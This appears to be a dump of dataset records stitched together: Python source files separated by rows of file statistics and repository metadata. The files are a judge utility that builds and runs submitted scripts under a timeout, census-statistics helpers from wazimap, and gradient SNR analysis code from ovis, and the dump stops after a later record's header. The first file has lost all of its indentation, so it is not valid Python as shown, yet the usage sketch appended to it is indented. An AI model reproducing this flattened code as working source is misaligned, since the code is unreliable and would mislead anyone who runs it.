import os
import json
import subprocess
import hashlib
import sys
import random
import string
from .output_processor import process_output
from . import code_templates
def make_file(path, code, problem_data):
"""Function to create script that is used for verification and profiling purposes
Returns nothing, writes to disk"""
def write_prequel(file_obj):
for line in ctemps["IMPORTS"]:
file_obj.write("{0}\n".format(line))
file_obj.write("\n")
def write_sequel(file_obj, fname):
if input_type == "file":
if init_data is not None:
text_to_write = ctemps["TEMPLATE_CODE_FILE_WITH_DATA"]
else:
text_to_write = ctemps["TEMPLATE_CODE_FILE"]
elif input_type == "default": ### CHANGE 'auto' TO 'default' AFTER PROBLEM UPLOAD VIEW IS CLEANED !!!
if is_inputs:
if is_init_data:
text_to_write = ctemps["TEMPLATE_CODE_DEFAULT_WITH_INPUT_AND_DATA"]
else:
text_to_write = ctemps["TEMPLATE_CODE_DEFAULT"]
elif is_init_data:
text_to_write = ctemps["TEMPLATE_CODE_DEFAULT"]
for line in text_to_write:
if "template_function" in line:
line = line.replace("template_function", str(fname))
file_obj.write("{0}\n".format(line))
ctemps = code_templates.get_ctemp_dict()
program_text = code
input_type = list(problem_data["metadata"]["input_type"].keys())[0]
main_function = problem_data["metadata"]["main_function"]
init_data = problem_data["init_data"]
is_init_data = problem_data["metadata"]["init_data"]
is_inputs = problem_data["metadata"]["inputs"]
with open(path, 'w') as f:
write_prequel(f)
for line in program_text:
split_line = line.split()
if len(split_line) > 0 and line.split()[0] == "def":
func_name = line.split()[1].split("(")[0]
if func_name == main_function:
fname = func_name
f.write("{0}\n".format(line))
if not line.endswith("\n"):
f.write("\n")
write_sequel(f, fname)
def gen_sample_outputs(filename, problem_data, init_data=None, input_type="default"):
"""Utility function invoked whenever a reference problem is submitted
Returns a list of outputs that are subsequently stored in DB as field associated with given problem"""
inputs = problem_data["inputs"]
platform = sys.platform.lower()
SAMPUP_TIMEOUT = "8"
SAMPUP_MEMOUT = "1000"
timeout_cmd = "gtimeout {0}".format(SAMPUP_TIMEOUT) if platform == "darwin" else "timeout {0} -m {1}".format(SAMPUP_TIMEOUT, SAMPUP_MEMOUT) if platform == "linux" or platform == "linux2" else ""
base_cmd = "{0} python".format(timeout_cmd)
outputs = []
if input_type == "default":
programmatic_inputs = inputs
if inputs is not None:
for inp in programmatic_inputs:
input_arg = json.dumps(inp)
output = process_output(base_cmd, filename, input_arg=input_arg, init_data=init_data)
### uncomment below line for debugging
# print("CSO =>", cleaned_split_output)
outputs.append(output)
else:
output = process_output(base_cmd, filename, init_data=init_data)
### uncomment below line for debugging
# print("CSO =>", cleaned_split_output)
outputs.append(output)
elif input_type == "file":
for script in inputs:
output = process_output(base_cmd, filename, input_arg=script, init_data=init_data)
### uncomment below line for debugging
# print("CSO =>", cleaned_split_output)
outputs.append(output)
try:
os.remove(script)
except:
pass
return outputs
def get_code_from_file(path):
with open(path, 'r') as f:
return f.read().splitlines()
def generate_input(input_type, input_length, num_tests):
"""Self-explanatory utility function that generates test input for a submitted reference problem based on metadata specifications
Returns jsonified list of inputs"""
def random_string(length):
rand_string = ''.join(random.choice(string.ascii_letters) for i in range(length))
return rand_string
global_inputs = []
for i in range(num_tests):
if input_type == "integer":
inp_list = [random.randint(1, 1000) for x in range(input_length)]
elif input_type == "float":
inp_list = [round(random.uniform(0.0, 1000.0), 2) for x in range(input_length)]
elif input_type == "string":
inp_list = [random_string(random.randint(1, 10)) for x in range(input_length)]
global_inputs.append(inp_list)
return global_inputs
def handle_uploaded_file_inputs(processed_data):
input_dict = {"files": {}}
count = 0
### add below for loop for multiple files
# for count, file_obj in enumerate(processed_data.get("target_file")):
input_dict["files"]["file_{0}".format(count+1)] = ""
file_obj = processed_data.get("target_file")
with open("file_{0}.py".format(count+1), 'w') as g:
for chunk in file_obj.chunks():
decoded_chunk = chunk.decode("utf-8")
input_dict["files"]["file_{0}".format(count+1)] += decoded_chunk
g.write(decoded_chunk)
return input_dict
def json_reorder(hashmap):
new_hm = {}
for k in sorted(hashmap, key=lambda item: (len(item), item), reverse=False):
new_hm[k] = hashmap[k]
return new_hm
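# Minimal usage sketch (illustrative values only): generate_input returns a
# list of `num_tests` input lists, each of length `input_length`, of the
# requested type.
if __name__ == "__main__":
    samples = generate_input("integer", input_length=5, num_tests=2)
    print(samples)  # e.g. [[412, 7, 903, 55, 261], [88, 640, 13, 777, 502]]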
| 40.2
| 198
| 0.632699
| 754
| 5,829
| 4.667109
| 0.274536
| 0.031827
| 0.018755
| 0.024155
| 0.247798
| 0.22819
| 0.212276
| 0.186132
| 0.123615
| 0.103723
| 0
| 0.009729
| 0.259393
| 5,829
| 145
| 199
| 40.2
| 0.80542
| 0.164522
| 0
| 0.09009
| 0
| 0
| 0.09338
| 0.023034
| 0
| 0
| 0
| 0
| 0
| 1
| 0.081081
| false
| 0.009009
| 0.09009
| 0
| 0.225225
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
904821f621f97dceeec43eb063d81e21fa90c37c
| 21,136
|
py
|
Python
|
wazimap/data/utils.py
|
AssembleOnline/wazimap
|
1b8b68fb231b768047eee1b20ed180e4820a2890
|
[
"MIT"
] | 1
|
2019-01-14T15:37:03.000Z
|
2019-01-14T15:37:03.000Z
|
wazimap/data/utils.py
|
Bhanditz/wazimap
|
fde22a0874020cf0ae013aeec7ab55b7c5a70b27
|
[
"MIT"
] | null | null | null |
wazimap/data/utils.py
|
Bhanditz/wazimap
|
fde22a0874020cf0ae013aeec7ab55b7c5a70b27
|
[
"MIT"
] | null | null | null |
from __future__ import division
from collections import OrderedDict
from sqlalchemy import create_engine, MetaData, func
from sqlalchemy.orm import sessionmaker, class_mapper
from django.conf import settings
from django.db.backends.base.creation import TEST_DATABASE_PREFIX
from django.db import connection
if settings.TESTING:
# Hack to ensure the sqlalchemy database name matches the Django one
# during testing
url = settings.DATABASE_URL
parts = url.split("/")
# use the test database name
db_name = connection.settings_dict.get('TEST', {}).get('NAME')
if db_name is None:
db_name = TEST_DATABASE_PREFIX + parts[-1]
parts[-1] = db_name
url = '/'.join(parts)
_engine = create_engine(url)
else:
_engine = create_engine(settings.DATABASE_URL)
# See http://docs.sqlalchemy.org/en/latest/core/constraints.html#constraint-naming-conventions
naming_convention = {
"ix": 'ix_%(column_0_label)s',
"uq": "uq_%(table_name)s_%(column_0_name)s",
"ck": "ck_%(table_name)s_%(constraint_name)s",
"fk": "fk_%(table_name)s_%(column_0_name)s_%(referred_table_name)s",
"pk": "pk_%(table_name)s"
}
_metadata = MetaData(bind=_engine, naming_convention=naming_convention)
_Session = sessionmaker(bind=_engine)
def get_session():
return _Session()
class LocationNotFound(Exception):
pass
class Location(object):
'''
Simple object to represent a location in the South African
context.
'''
def __init__(self, address, province_code, ward_code, ward_no,
municipality, coordinates):
self.address = address
self.province_code = province_code
# Northern Province is now called Limpopo
if self.province_code == 'NP':
self.province_code = 'LIM'
self.ward_code = ward_code
self.ward_no = ward_no
self.municipality = municipality
self.latitude = coordinates[0]
self.longitude = coordinates[1]
def __repr__(self):
return 'Location(address="%s", ward_code="%s", ' \
'municipality="%s", province_code="%s", ' \
'latitude=%s, longitude=%s, ward_no=%s)' \
% (self.address, self.ward_code, self.municipality,
self.province_code, self.latitude, self.longitude,
self.ward_no)
def capitalize(s):
"""
Capitalize the first char of a string, without
affecting the rest of the string.
This differs from `str.capitalize` since the latter
also lowercases the rest of the string.
"""
if not s:
return s
return ''.join([s[0].upper(), s[1:]])
def percent(num, denom, places=2):
if denom == 0:
return 0
else:
return round(num / denom * 100, places)
def ratio(num, denom, places=2):
if denom == 0:
return 0
else:
return round(num / denom, places)
def add_metadata(data, table):
if 'metadata' not in data:
data['metadata'] = {}
# this might be a SQLAlchemy model that is linked back to
# a data table
if hasattr(table, 'data_tables'):
table = table.data_tables[0]
data['metadata']['table_id'] = table.id
if table.universe:
data['metadata']['universe'] = table.universe
if table.year:
data['metadata']['year'] = table.year
# dictionaries that merge_dicts will merge
MERGE_KEYS = set(['values', 'numerators', 'error'])
def collapse_categories(data, categories, key_order=None):
if key_order:
collapsed = OrderedDict((key, {'name': key}) for key in key_order)
else:
collapsed = {}
metadata = None
if 'metadata' in data:
metadata = data['metadata']
del data['metadata']
# level 1: iterate over categories in data
for fields in data.values():
new_category_name = categories[fields['name']]
# ignore items with a None category
if new_category_name is None:
continue
collapsed.setdefault(new_category_name, {'name': new_category_name})
new_fields = collapsed[new_category_name]
# level 2: iterate over measurement objects in category
for measurement_key, measurement_objects in fields.iteritems():
if measurement_key == 'name':
continue
new_fields.setdefault(measurement_key, {})
new_measurement_objects = new_fields[measurement_key]
# level 3: iterate over data points in measurement objects
for datapoint_key, datapoint_value in measurement_objects.iteritems():
try:
new_measurement_objects.setdefault(datapoint_key, 0)
new_measurement_objects[datapoint_key] += float(datapoint_value)
except (ValueError, TypeError):
new_measurement_objects[datapoint_key] = datapoint_value
if metadata is not None:
collapsed['metadata'] = metadata
return collapsed
def calculate_median(objects, field_name):
'''
Calculates the median where obj.total is the distribution count and
getattr(obj, field_name) is the distribution segment.
Note: this function assumes the objects are sorted.
'''
total = 0
for obj in objects:
total += obj.total
half = total / 2.0
counter = 0
for i, obj in enumerate(objects):
counter += obj.total
if counter > half:
if counter - half == 1:
# total must be even (otherwise counter - half ends with .5)
return (float(getattr(objects[i - 1], field_name)) +
float(getattr(obj, field_name))) / 2.0
return float(getattr(obj, field_name))
elif counter == half:
# total must be even (otherwise half ends with .5)
return (float(getattr(obj, field_name)) +
float(getattr(objects[i + 1], field_name))) / 2.0
def calculate_median_stat(stats):
'''
Calculates the stat (key) that lies at the median for stat data from the
output of get_stat_data.
Note: this function assumes the objects are sorted.
'''
total = 0
keys = [k for k in stats.iterkeys() if k != 'metadata']
total = sum(stats[k]['numerators']['this'] for k in keys)
half = total / 2.0
counter = 0
for key in keys:
counter += stats[key]['numerators']['this']
if counter >= half:
return key
def merge_dicts(this, other, other_key):
'''
Recursively merges 'other' dict into 'this' dict. In particular
it merges the leaf nodes specified in MERGE_KEYS.
'''
for key, values in this.iteritems():
if key in MERGE_KEYS:
if key in other:
values[other_key] = other[key]['this']
elif isinstance(values, dict):
merge_dicts(values, other[key], other_key)
def group_remainder(data, num_items=4, make_percentage=True,
remainder_name="Other"):
'''
This function assumes data is an OrderedDict instance. It iterates
over the dict items, grouping items with index >= num_items - 1 together
under key remainder_name. If make_percentage = True, the 'values' dict
contains percentages and the 'numerators' dict the totals. Otherwise
'values' contains the totals.
'''
num_key = 'numerators' if make_percentage else 'values'
total_all = dict((k, 0.0) for k in data.values()[0][num_key].keys())
total_other = total_all.copy()
other_dict = {
"name": remainder_name,
"error": {"this": 0.0},
"numerator_errors": {"this": 0.0},
num_key: total_other,
}
cutoff = num_items - 2
for i, (key, values) in enumerate(data.items()):
if key == 'metadata':
continue
for k, v in values[num_key].iteritems():
total_all[k] += v
if i > cutoff:
del data[key]
data.setdefault(remainder_name, other_dict)
for k, v in values[num_key].iteritems():
total_other[k] += v
if make_percentage:
for key, values in data.iteritems():
if key != 'metadata':
values['values'] = dict((k, percent(v, total_all[k]))
for k, v in values['numerators'].iteritems())
def get_objects_by_geo(db_model, geo, session, fields=None, order_by=None,
only=None, exclude=None, data_table=None):
""" Get rows of statistics from the stats mode +db_model+ for a particular
geography, summing over the 'total' field and grouping by +fields+. Filters
to include +only+ and ignore +exclude+, if given.
"""
data_table = data_table or db_model.data_tables[0]
if fields is None:
fields = [c.key for c in class_mapper(db_model).attrs if c.key not in ['geo_code', 'geo_level', 'geo_version', 'total']]
fields = [getattr(db_model, f) for f in fields]
objects = session\
.query(func.sum(db_model.total).label('total'), *fields)\
.group_by(*fields)\
.filter(db_model.geo_code == geo.geo_code)\
.filter(db_model.geo_level == geo.geo_level)\
.filter(db_model.geo_version == geo.version)
if only:
for k, v in only.iteritems():
objects = objects.filter(getattr(db_model, k).in_(v))
if exclude:
for k, v in exclude.iteritems():
objects = objects.filter(getattr(db_model, k).notin_(v))
if order_by is not None:
attr = order_by
is_desc = False
if order_by[0] == '-':
is_desc = True
attr = attr[1:]
if attr == 'total':
if is_desc:
attr = attr + ' DESC'
else:
attr = getattr(db_model, attr)
if is_desc:
attr = attr.desc()
objects = objects.order_by(attr)
objects = objects.all()
if len(objects) == 0:
raise LocationNotFound("%s for geography %s version '%s' not found"
% (db_model.__table__.name, geo.geoid, geo.version))
return objects
def get_stat_data(fields, geo, session, order_by=None,
percent=True, total=None, table_fields=None,
table_name=None, only=None, exclude=None, exclude_zero=False,
recode=None, key_order=None, table_dataset=None,
percent_grouping=None, slices=None):
"""
This is our primary helper routine for building a dictionary suitable for
a place's profile page, based on a statistic.
It sums over the data for ``fields`` in the database for the place identified by
``geo`` and calculates numerators and values. If multiple fields are given,
it creates nested result dictionaries.
Control the rows that are included or ignored using ``only``, ``exclude`` and ``exclude_zero``.
The field values can be recoded using ``recode`` and re-ordered using ``key_order``.
:param fields: the census field to build stats for. Specify a list of fields to build
nested statistics. If multiple fields are specified, then the values
of parameters such as ``only``, ``exclude`` and ``recode`` will change.
These must be fields in `api.models.census.census_fields`, e.g. 'highest educational level'
:type fields: str or list
:param geo: the geography object
:param dbsession session: sqlalchemy session
:param str order_by: field to order by, or None for default, eg. '-total'
:param bool percent: should we calculate percentages, or just sum raw values?
:param list percent_grouping: when calculating percentages, which fields should rows be grouped by?
Default: none of them -- calculate each entry as a percentage of the
whole dataset. Ignored unless ``percent`` is ``True``.
:param list table_fields: list of fields to use to find the table, defaults to `fields`
:param int total: the total value to use for percentages, or None to total columns automatically
:param str table_name: override the table name, otherwise it's calculated from the fields and geo_level
:param list only: only include these field values. If ``fields`` has many items, this must be a dict
mapping field names to a list of strings.
:type only: dict or list
:param exclude: ignore these field values. If ``fields`` has many items, this must be a dict
mapping field names to a list of strings. Field names are checked
before any recoding.
:type exclude: dict or list
:param bool exclude_zero: ignore fields that have a zero or null total
:param recode: function or dict to recode values of ``key_field``. If ``fields`` is a singleton,
then the keys of this dict must be the values to recode from, otherwise
they must be the field names and then the values. If this is a lambda,
it is called with the field name and its value as arguments.
:type recode: dict or lambda
:param key_order: ordering for keys in result dictionary. If ``fields`` has many items,
this must be a dict from field names to orderings.
The default ordering is determined by ``order``.
:type key_order: dict or list
:param str table_dataset: dataset used to help find the table if ``table_name`` isn't given.
:param list slices: return only a slice of the final data, by choosing a single value for each
field in the field list, as specified in the slice list.
:return: (data-dictionary, total)
"""
from .tables import FieldTable
if not isinstance(fields, list):
fields = [fields]
n_fields = len(fields)
many_fields = n_fields > 1
if order_by is None:
order_by = fields[0]
if only is not None:
if not isinstance(only, dict):
if many_fields:
raise ValueError("If many fields are given, then only must be a dict. I got %s instead" % only)
else:
only = {fields[0]: set(only)}
if exclude is not None:
if not isinstance(exclude, dict):
if many_fields:
raise ValueError("If many fields are given, then exclude must be a dict. I got %s instead" % exclude)
else:
exclude = {fields[0]: set(exclude)}
if key_order:
if not isinstance(key_order, dict):
if many_fields:
raise ValueError("If many fields are given, then key_order must be a dict. I got %s instead" % key_order)
else:
key_order = {fields[0]: key_order}
else:
key_order = {}
if recode:
if not isinstance(recode, dict) or not many_fields:
recode = dict((f, recode) for f in fields)
table_fields = table_fields or fields
# get the table and the model
if table_name:
data_table = FieldTable.get(table_name)
else:
data_table = FieldTable.for_fields(table_fields, table_dataset)
if not data_table:
ValueError("Couldn't find a table that covers these fields: %s" % table_fields)
objects = get_objects_by_geo(data_table.model, geo, session, fields=fields, order_by=order_by,
only=only, exclude=exclude, data_table=data_table)
if total is not None and many_fields:
raise ValueError("Cannot specify a total if many fields are given")
if total and percent_grouping:
raise ValueError("Cannot specify a total if percent_grouping is given")
if total is None and percent and data_table.total_column is None:
# The table doesn't support calculating percentages, but the caller
# has asked for a percentage without providing a total value to use.
# Either specify a total, or specify percent=False
raise ValueError("Asking for a percent on table %s that doesn't support totals and no total parameter specified." % data_table.id)
# sanity check the percent grouping
if percent:
if percent_grouping:
for field in percent_grouping:
if field not in fields:
raise ValueError("Field '%s' specified in percent_grouping must be in the fields list." % field)
# re-order percent grouping to be same order as in the field list
percent_grouping = [f for f in fields if f in percent_grouping]
else:
percent_grouping = None
denominator_key = getattr(data_table, 'denominator_key')
root_data = OrderedDict()
running_total = 0
group_totals = {}
grand_total = -1
def get_recoded_key(recode, field, key):
recoder = recode[field]
if isinstance(recoder, dict):
return recoder.get(key, key)
else:
return recoder(field, key)
def get_data_object(obj):
""" Recurse down the list of fields and return the
final resting place for data for this stat. """
data = root_data
for i, field in enumerate(fields):
key = getattr(obj, field)
if recode and field in recode:
key = get_recoded_key(recode, field, key)
else:
key = capitalize(key)
# enforce key ordering the first time we see this field
if (not data or data.keys() == ['metadata']) and field in key_order:
for fld in key_order[field]:
data[fld] = OrderedDict()
# ensure it's there
if key not in data:
data[key] = OrderedDict()
data = data[key]
# default values for intermediate fields
if data is not None and i < n_fields - 1:
data['metadata'] = {'name': key}
# data is now the dict where the end value is going to go
if not data:
data['name'] = key
data['numerators'] = {'this': 0.0}
return data
# run the stats for the objects
for obj in objects:
if not obj.total and exclude_zero:
continue
if denominator_key and getattr(obj, data_table.fields[-1]) == denominator_key:
grand_total = obj.total
# don't include the denominator key in the output
continue
# get the data dict where these values must go
data = get_data_object(obj)
if not data:
continue
if obj.total is not None:
data['numerators']['this'] += obj.total
running_total += obj.total
else:
# TODO: sanity check this is the right thing to do for multiple fields with
# nested nulls -- does aggregating over nulls treat them as zero, or should we
# treat them as null?
data['numerators']['this'] = None
if percent_grouping:
if obj.total is not None:
group_key = tuple()
for field in percent_grouping:
key = getattr(obj, field)
if recode and field in recode:
# Group by recoded keys
key = get_recoded_key(recode, field, key)
group_key = group_key + (key,)
data['_group_key'] = group_key
group_totals[group_key] = group_totals.get(group_key, 0) + obj.total
if grand_total == -1:
grand_total = running_total if total is None else total
# add in percentages
def calc_percent(data):
for key, data in data.iteritems():
if not key == 'metadata':
if 'numerators' in data:
if percent:
if '_group_key' in data:
total = group_totals[data.pop('_group_key')]
else:
total = grand_total
if total is not None and data['numerators']['this'] is not None:
perc = 0 if total == 0 else (data['numerators']['this'] / total * 100)
data['values'] = {'this': round(perc, 2)}
else:
data['values'] = {'this': None}
else:
data['values'] = dict(data['numerators'])
data['numerators']['this'] = None
else:
calc_percent(data)
calc_percent(root_data)
if slices:
for v in slices:
root_data = root_data[v]
add_metadata(root_data, data_table)
return root_data, grand_total
def create_debug_dump(data, geo_level, name):
import os
import json
debug_dir = os.path.join(os.path.dirname(__file__), 'debug')
if not os.path.exists(debug_dir):
os.mkdir(debug_dir)
with open(os.path.join(debug_dir, '%s_%s.json' % (name, geo_level)), 'w') as f:
f.write(json.dumps(data, indent=4))
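# Minimal usage sketch (hypothetical field name, geography and session, not
# part of this module): a profile page helper would typically call
# get_stat_data and receive a nested data dict plus the grand total.
def example_profile_section(geo, session):
    gender_data, total_pop = get_stat_data(
        ['gender'], geo, session,
        key_order=['Male', 'Female'])
    return {'gender_distribution': gender_data, 'total_population': total_pop}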
| 36.758261
| 138
| 0.607116
| 2,761
| 21,136
| 4.519377
| 0.159725
| 0.01154
| 0.007213
| 0.005289
| 0.148341
| 0.115403
| 0.09673
| 0.070284
| 0.057702
| 0.052412
| 0
| 0.005025
| 0.303321
| 21,136
| 574
| 139
| 36.8223
| 0.842377
| 0.277016
| 0
| 0.180516
| 0
| 0
| 0.094829
| 0.011686
| 0
| 0
| 0
| 0.001742
| 0
| 1
| 0.051576
| false
| 0.002865
| 0.028653
| 0.005731
| 0.137536
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
9048acfcee11de068839ac11bcc199658e3bb1fe
| 9,913
|
py
|
Python
|
ovis/analysis/gradients.py
|
vlievin/ovis
|
71f05a5f5219b2df66a9cdbd5a5339e0e179597b
|
[
"MIT"
] | 10
|
2020-08-06T22:25:11.000Z
|
2022-03-07T13:10:15.000Z
|
ovis/analysis/gradients.py
|
vlievin/ovis
|
71f05a5f5219b2df66a9cdbd5a5339e0e179597b
|
[
"MIT"
] | 2
|
2021-06-08T22:15:24.000Z
|
2022-03-12T00:45:59.000Z
|
ovis/analysis/gradients.py
|
vlievin/ovis
|
71f05a5f5219b2df66a9cdbd5a5339e0e179597b
|
[
"MIT"
] | null | null | null |
from time import time
from typing import *
import torch
from booster import Diagnostic
from torch import Tensor
from tqdm import tqdm
from .utils import cosine, percentile, RunningMean, RunningVariance
from ..estimators import GradientEstimator
from ..models import TemplateModel
def get_grads_from_tensor(model: TemplateModel, loss: Tensor, output: Dict[str, Tensor], tensor_id: str, mc: int, iw: int):
"""
Compute the gradients given a `tensor` on which was called `tensor.retain_graph()`
Assumes `tensor` to have `tensor.shape[0] == bs * iw * mc`
:param model: VAE model
:param loss: loss value
:param output: model's output: dict
:param tensor_id: key of the tensor in the model output
:param mc: number of outer Monte-Carlo samples
:param iw: number of inner Importance-Weighted samples
:return: gradient: Tensor of shape [D,] where D is the number of elements in `tensor`
"""
assert tensor_id in output.keys(), f"Tensor_id = `{tensor_id}` not in model's output"
model.zero_grad()
loss.sum().backward(create_graph=True, retain_graph=True)
# get the tensor of interest
tensors = output[tensor_id] if isinstance(output[tensor_id], list) else [output[tensor_id]]  # wrap a single tensor so the code below can iterate
bs = tensors[0].shape[0] // (mc * iw)
# get the gradients, flatten and concat across the feature dimension
gradients = [p.grad for p in tensors]
assert not any(
[g is None for g in gradients]), f"{sum([int(g is None) for g in gradients])} tensors have no gradients. " \
f"Use `tensor.retain_graph()` in your model to enable gradients. " \
f"tensor_id = `{tensor_id}`"
# compute gradients estimate for each individual grads
# sum individual gradients because x_expanded = x.expand(bs, mc, iw)
gradients = torch.cat([g.view(bs, mc * iw, -1).sum(1) for g in gradients], 1)
# return an MC average of the grads
return gradients.mean(0)
def get_grads_from_parameters(model: TemplateModel, loss: Tensor, key_filter: str = ''):
"""
Return the gradients for the parameters matching the `key_filter`
:param model: VAE model
:param loss: loss value
:param key_filter: filter value (comma separated values accepted (e.g. "A,b"))
:return: Tensor of shape [D,] where `D` is the number of parameters
"""
key_filters = key_filter.split(',')
params = [p for k, p in model.named_parameters() if any([(_key in k) for _key in key_filters])]
assert len(params) > 0, f"No parameters matching filter = `{key_filters}`"
model.zero_grad()
# backward individual gradients \nabla L[i]
loss.mean().backward(create_graph=True, retain_graph=True)
# gather gradients for each parameter and concat such that each element across the dim 1 is a parameter
grads = [p.grad.view(-1) for p in params if p.grad is not None]
return torch.cat(grads, 0)
def get_gradients_statistics(estimator: GradientEstimator,
model: TemplateModel,
x: Tensor,
mc_samples: int = 100,
key_filter: str = 'inference_network',
oracle_grad: Optional[Tensor] = None,
return_grads: bool = False,
compute_dsnr: bool = True,
samples_per_batch: Optional[int] = None,
eps: float = 1e-15,
tqdm: Callable = tqdm,
**config: Dict) -> Tuple[Diagnostic, Dict]:
"""
Compute the gradients and return the statistics (Variance, Magnitude, SNR, DSNR)
    If an oracle gradient is available, also compute the cosine similarity (direction) between the gradient estimate and the oracle.
    The Magnitude, Variance and SNR are defined parameter-wise. All returned values are averaged over the D parameters with
    Variance > eps. For instance, the returned SNR is
    * SNR = 1/D \sum_d SNR_d
    Each MC sample is computed sequentially, and the mini-batch `x` is split into chunks
    if `samples_per_batch` is specified and `samples_per_batch < x.size(0) * mc * iw`.
:param estimator: Gradient Estimator
:param model: VAE model
:param x: mini-batch of observations
:param mc_samples: number of Monte-Carlo samples
:param key_filter: key matching parameters names in the model
:param oracle_grad: true direction of the gradients [Optional]
    :param return_grads: return all gradients in the `meta` output dictionary if set to `True`
:param compute_dsnr: compute the Directional SNR if set to `True`
:param samples_per_batch: max. number of individual samples `bs * mc * iw` per mini-batch [Optional]
:param eps: minimum Variance value used for filtering
:param config: config dictionary for the estimator
:param tqdm: custom `tqdm` function
    :return: output : Diagnostic = {'grads': {'variance': ..,
                                              'magnitude': ..,
                                              'snr': ..,
                                              'dsnr': ..,
                                              'direction': cosine similarity with the oracle,
                                              'keep_ratio': ratio of parameter-wise gradients with variance > eps},
                                    'snr': {'percentiles', 'mean', 'min', 'max'}},
             meta : additional data including the gradient values if `return_grads`
"""
_start = time()
grads_dsnr = None
grads_mean = RunningMean()
grads_variance = RunningVariance()
if oracle_grad is not None:
grads_dir = RunningMean()
all_grads = None
# compute each MC sample sequentially
for i in tqdm(range(mc_samples), desc="Gradients Analysis"):
        # compute the number of chunks based on the capacity `samples_per_batch`
        if samples_per_batch is None:
            chunks = 1
        else:
            bs = x.size(0)
            mc = estimator.config['mc']
            iw = estimator.config['iw']
            # infer number of chunks
            total_samples = bs * mc * iw
            chunks = max(1, -(-total_samples // samples_per_batch))  # ceiling division
        # compute the mini-batch gradient by chunk if `x` is large
        gradients = RunningMean()
        for k, x_ in enumerate(x.chunk(chunks, dim=0)):
model.eval()
model.zero_grad()
# forward, backward to compute the gradients
loss, diagnostics, output = estimator(model, x_, backward=False, **config)
# gather mini-batch gradients
if 'tensor:' in key_filter:
tensor_id = key_filter.replace("tensor:", "")
gradients_ = get_grads_from_tensor(model, loss, output, tensor_id, estimator.mc, estimator.iw)
else:
gradients_ = get_grads_from_parameters(model, loss, key_filter=key_filter)
# move to cpu
gradients_ = gradients_.detach().cpu()
# update average
gradients.update(gradients_, k=x_.size(0))
# gather statistics
with torch.no_grad():
gradients = gradients()
if return_grads or compute_dsnr:
all_grads = gradients[None] if all_grads is None else torch.cat([all_grads, gradients[None]], 0)
grads_mean.update(gradients)
grads_variance.update(gradients)
# compute the statistics
with torch.no_grad():
# compute statistics for each data point `x_i`
grads_variance = grads_variance()
grads_mean = grads_mean()
# compute signal-to-noise ratio. see `tighter variational bounds are not necessarily better` (eq. 4)
grad_var_sqrt = grads_variance.pow(0.5)
clipped_variance_sqrt = grad_var_sqrt.clamp(min=eps)
grads_snr = grads_mean.abs() / (clipped_variance_sqrt)
# compute DSNR, see `tighter variational bounds are not necessarily better` (eq. 12)
if compute_dsnr:
u = all_grads.mean(0, keepdim=True)
u /= u.norm(dim=1, keepdim=True, p=2)
g_parallel = u * (u * all_grads).sum(1, keepdim=True)
g_perpendicular = all_grads - g_parallel
grads_dsnr = g_parallel.norm(dim=1, p=2) / (eps + g_perpendicular.norm(dim=1, p=2))
# compute grad direction: cosine similarity between the gradient estimate and the oracle
if oracle_grad is not None:
grads_dir = cosine(grads_mean, oracle_grad, dim=-1)
# reinitialize grads
model.zero_grad()
        # reduce fn: keep only parameters with variance > eps
mask = (grads_variance > eps).float()
_reduce = lambda x: (x * mask).sum() / mask.sum()
output = Diagnostic({'grads': {
'variance': _reduce(grads_variance),
'magnitude': _reduce(grads_mean.abs()),
'snr': _reduce(grads_snr),
'dsnr': grads_dsnr.mean() if grads_dsnr is not None else 0.,
'keep_ratio': mask.sum() / torch.ones_like(mask).sum()
},
'snr': {
'p25': percentile(grads_snr, q=0.25), 'p50': percentile(grads_snr, q=0.50),
'p75': percentile(grads_snr, q=0.75), 'p5': percentile(grads_snr, q=0.05),
'p95': percentile(grads_snr, q=0.95), 'min': grads_snr.min(),
'max': grads_snr.max(), 'mean': grads_snr.mean()}
})
if oracle_grad is not None:
output['grads']['direction'] = grads_dir.mean()
# additional data: raw grads, and mean,var,snr for each parameter separately
meta = {
'grads': all_grads,
'expected': grads_mean,
'magnitude': grads_mean.abs(),
'var': grads_variance,
'snr': grads_snr,
}
return output, meta
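# --- Editor's illustration (not part of the original module) ------------------------
# A minimal, self-contained sketch of the parameter-wise statistics computed by
# `get_gradients_statistics`: given `mc_samples` gradient estimates of a D-dimensional
# parameter vector, the SNR is |mean| / sqrt(variance) per parameter. The random
# tensors below are purely hypothetical and only illustrate the arithmetic.
if __name__ == "__main__":
    mc_samples, D = 100, 8
    fake_grads = 0.5 + 0.1 * torch.randn(mc_samples, D)  # stand-in gradient estimates
    mean = fake_grads.mean(0)
    variance = fake_grads.var(0)
    snr = mean.abs() / variance.clamp(min=1e-15).pow(0.5)
    print({"variance": variance.mean().item(),
           "magnitude": mean.abs().mean().item(),
           "snr": snr.mean().item()})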
| 42.545064
| 125
| 0.611924
| 1,260
| 9,913
| 4.684127
| 0.21746
| 0.016266
| 0.017791
| 0.016096
| 0.147069
| 0.076415
| 0.072857
| 0.052525
| 0.042697
| 0.011183
| 0
| 0.009255
| 0.291536
| 9,913
| 232
| 126
| 42.728448
| 0.831126
| 0.382528
| 0
| 0.094828
| 0
| 0
| 0.070229
| 0.003902
| 0
| 0
| 0
| 0
| 0.025862
| 1
| 0.025862
| false
| 0
| 0.077586
| 0
| 0.12931
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
904a907ab750687eb1de030da0541431f23b5d88
| 1,081
|
py
|
Python
|
Sem-09-T1-Q5.py
|
daianasousa/Semana-09
|
decfc9b47931ae4f5a4f30a0d26b931ecd548f59
|
[
"MIT"
] | null | null | null |
Sem-09-T1-Q5.py
|
daianasousa/Semana-09
|
decfc9b47931ae4f5a4f30a0d26b931ecd548f59
|
[
"MIT"
] | null | null | null |
